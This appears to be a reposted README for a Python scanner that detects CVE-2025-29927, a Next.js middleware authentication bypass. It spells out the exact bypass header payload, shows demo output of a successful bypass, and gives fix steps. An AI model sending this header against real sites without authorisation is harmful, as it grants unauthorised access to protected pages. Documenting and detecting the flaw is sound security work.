Exploit for CVE-2025-29927

## https://sploitus.com/exploit?id=51277A52-52A0-5266-9473-014D14B18C92
# 🔍 CVE-2025-29927 - Next.js Middleware Bypass Detector

This Python-based smart scanner helps detect the **CVE-2025-29927** vulnerability in Next.js applications — a critical middleware bypass that allows attackers to skip authentication using a crafted HTTP header.

> 🧠 The tool identifies not only HTTP redirects but also client-side redirection mechanisms such as `<meta http-equiv="refresh">`, keyword-based login redirects, and silent auth bypasses.

---

## 🚀 Features

- ✅ Interactive input (target URL and path)
- ✅ Smart detection of:
  - `x-middleware-subrequest` bypass headers
  - `<meta refresh>` based redirects
  - HTML content with keywords like `login`, `sign in`, `authentication`
- ✅ Color-coded CLI output:
  - 🟩 Green for 2xx responses
  - 🟨 Yellow for 3xx
  - 🟥 Red for 4xx/5xx
- ✅ Early exit if bypass is successful
- ✅ Easy to extend and customize

---

## 📸 Demo

```
$ python3 CVE-2025-29927.py

🌐 Enter the target site URL (e.g. http://localhost:3000): http://vulnerable.local
📁 Enter the protected path (e.g. /dashboard): /admin

→ Testing with header: middleware:middleware:middleware:middleware:middleware
   ↳ HTTP Status: 200
   ↳ Redirect detected: No

✅ VULNERABLE! Bypass successful with header:
   x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
```

---

## 🧑‍💻 How to Use

### 1. Clone the repository:

```bash
git clone https://github.com/sagsooz/CVE-2025-29927.git
cd CVE-2025-29927
```

### 2. Install dependencies:

```bash
pip install -r requirements.txt
```

### 3. Run the script:

```bash
python3 CVE-2025-29927.py
```

---

## 📂 Project Structure

```
.
├── CVE-2025-29927.py   # Main interactive scanner
├── requirements.txt            # Python dependencies
└── README.md                   # This file
```

---

## 📦 requirements.txt

```txt
requests
beautifulsoup4
colorama
```

---

## 🛡️ How to Fix

If your app is affected, do the following:

1. **Update Next.js** to `v15.2.3` or later (or `14.2.25+` / `13.5.7+`)
2. **Harden middleware routing** and avoid relying solely on middleware for authentication.
3. **Strip x-middleware-subrequest header** at the edge (e.g. Nginx):

```nginx
proxy_set_header x-middleware-subrequest "";
```

---

## ℹ️ About the Vulnerability

CVE-2025-29927 allows attackers to bypass Next.js middleware checks by manipulating the `x-middleware-subrequest` header with crafted values such as:

```
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
```

In vulnerable versions, this disables middleware execution completely — allowing direct access to protected routes like `/dashboard`, `/admin`, etc.

---

## 📬 Contact

Maintained by: [@mrzblackhat](https://t.me/mrzblackhat)  
Feel free to contact me on Telegram for suggestions, improvements, or contributions.

---

## 🏷 Tags

`next.js` `CVE-2025-29927` `bugbounty` `middleware bypass` `authentication` `web security` `python security scanner` `ethical hacking`

---

## 📄 License

This tool is provided for **educational and research purposes only**. Use responsibly.